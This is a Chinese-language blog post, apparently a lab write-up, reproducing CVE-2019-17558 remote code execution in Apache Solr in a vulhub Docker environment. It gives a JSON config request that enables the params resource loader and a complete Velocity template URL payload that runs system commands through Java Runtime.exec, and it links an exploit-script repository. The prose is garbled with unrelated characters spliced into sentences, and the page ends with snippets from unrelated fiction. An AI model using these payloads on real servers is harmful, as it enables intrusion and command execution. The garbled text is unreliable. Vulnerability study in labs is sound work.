Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

0x00簡介

Solr 是一個開源的企業(yè)級搜索服務(wù)器伦腐,底層使用易于擴展和修改的Java 來實現(xiàn)靶端。服務(wù)器通信使用標(biāo)準(zhǔn)的HTTP 和XML粪糙,所以如果使用Solr 了解Java 技術(shù)會有用卻不是必須的要求。

Solr 主要特性有:強大的全文檢索功能蒸苇,高亮顯示檢索結(jié)果陡鹃,動態(tài)集群烘浦,數(shù)據(jù)庫接口和電子文檔(Word ,PDF 等)的處理萍鲸。而且Solr 具有高度的可擴展闷叉,支持分布搜索和索引的復(fù)制。

Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

0x01漏洞概述

Apache Solr 5.0.0版本至8.3.1版本中存在輸入驗證錯誤漏洞猿推。攻擊者可借助Velocity模板利用該漏洞在系統(tǒng)上執(zhí)行任意代碼片习。

0x02影響版本

Apache Solr 5.0.0 ~8.3.1

0x03環(huán)境搭建

1、本次環(huán)境搭建使用vulhub搭建蹬叭,下載地址:

git clone chttps://github.com/vulhub/vulhub.git

2藕咏、下載至有docker環(huán)境的虛擬機中,進入目錄拉取docker

cd vulhub-master/solr/CVE-2019-17558/

docker-compose up -d

Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

3秽五、看到綠色“done”拉取成功孽查,在瀏覽器訪問http://your-ip:8983

Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

0x04漏洞復(fù)現(xiàn)

1、默認(rèn)情況下params.resource.loader.enabled配置未打開坦喘,無法使用自定義模板盲再。可以先通過如下API獲取所有的核心 //在vulhub中核心就是demo

http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

2瓣铣、啟用配置params.resource.loader.enabled答朋,在url訪問/solr/demo/config使用Burp抓包改成POST然后修改啟動配置 //然后把Content-Type修改成application/json

 {
 "update-queryresponsewriter": {
 "startup": "lazy",
 "name": "velocity",
 "class": "solr.VelocityResponseWriter",
 "template.base.dir": "",
 "solr.resource.loader.enabled": "true",
 "params.resource.loader.enabled": "true"
 }
 }
Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)
Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

3、然后通過Velocity模板即可執(zhí)行任意命令棠笑,命令如下:

http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=set($x=)+set($rt=$x.class.forName(java.lang.Runtime))+set($chr=$x.class.forName(java.lang.Character))+set($str=$x.class.forName(java.lang.String))+set($ex=$rt.getRuntime().exec(id))+$ex.waitFor()+set($out=$ex.getInputStream())+foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))end
Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)
Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

4梦碗、使用python腳本進行漏洞利用,使用python3運行蓖救,腳本下載地址://注:此類利用腳本GitHub上很多可自行搜索

https://github.com/zhzyker/exphub

Apache Solr Velocity 注入遠(yuǎn)程命令執(zhí)行漏洞 (CVE-2019-17558)

0x05修復(fù)建議

1洪规、建議升級Appache Salc到最新版

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市循捺,隨后出現(xiàn)的幾起案子斩例,更是在濱河造成了極大的恐慌,老刑警劉巖从橘,帶你破解...
    沈念sama閱讀 218,941評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件念赶,死亡現(xiàn)場離奇詭異础钠,居然都是意外死亡,警方通過查閱死者的電腦和手機晶乔,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,397評論 3 395
  • 文/潘曉璐 我一進店門珍坊,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人正罢,你說我怎么就攤上這事阵漏。” “怎么了翻具?”我有些...
    開封第一講書人閱讀 165,345評論 0 356
  • 文/不壞的土叔 我叫張陵履怯,是天一觀的道長。 經(jīng)常有香客問我裆泳,道長叹洲,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,851評論 1 295
  • 正文 為了忘掉前任工禾,我火速辦了婚禮运提,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘闻葵。我一直安慰自己民泵,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,868評論 6 392
  • 文/花漫 我一把揭開白布槽畔。 她就那樣靜靜地躺著栈妆,像睡著了一般。 火紅的嫁衣襯著肌膚如雪厢钧。 梳的紋絲不亂的頭發(fā)上鳞尔,一...
    開封第一講書人閱讀 51,688評論 1 305
  • 那天,我揣著相機與錄音早直,去河邊找鬼寥假。 笑死,一個胖子當(dāng)著我的面吹牛霞扬,可吹牛的內(nèi)容都是我干的昧旨。 我是一名探鬼主播,決...
    沈念sama閱讀 40,414評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼祥得,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了蒋得?” 一聲冷哼從身側(cè)響起级及,我...
    開封第一講書人閱讀 39,319評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎额衙,沒想到半個月后饮焦,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體怕吴,經(jīng)...
    沈念sama閱讀 45,775評論 1 315
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,945評論 3 336
  • 正文 我和宋清朗相戀三年县踢,在試婚紗的時候發(fā)現(xiàn)自己被綠了转绷。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,096評論 1 350
  • 序言:一個原本活蹦亂跳的男人離奇死亡硼啤,死狀恐怖议经,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情谴返,我是刑警寧澤煞肾,帶...
    沈念sama閱讀 35,789評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站嗓袱,受9級特大地震影響籍救,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜渠抹,卻給世界環(huán)境...
    茶點故事閱讀 41,437評論 3 331
  • 文/蒙蒙 一蝙昙、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧梧却,春花似錦奇颠、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,993評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至三椿,卻和暖如春缺菌,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背搜锰。 一陣腳步聲響...
    開封第一講書人閱讀 33,107評論 1 271
  • 我被黑心中介騙來泰國打工伴郁, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人蛋叼。 一個月前我還...
    沈念sama閱讀 48,308評論 3 372
  • 正文 我出身青樓焊傅,卻偏偏與公主長得像,于是被迫代替她去往敵國和親狈涮。 傳聞我的和親對象是個殘疾皇子狐胎,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,037評論 2 355

推薦閱讀更多精彩內(nèi)容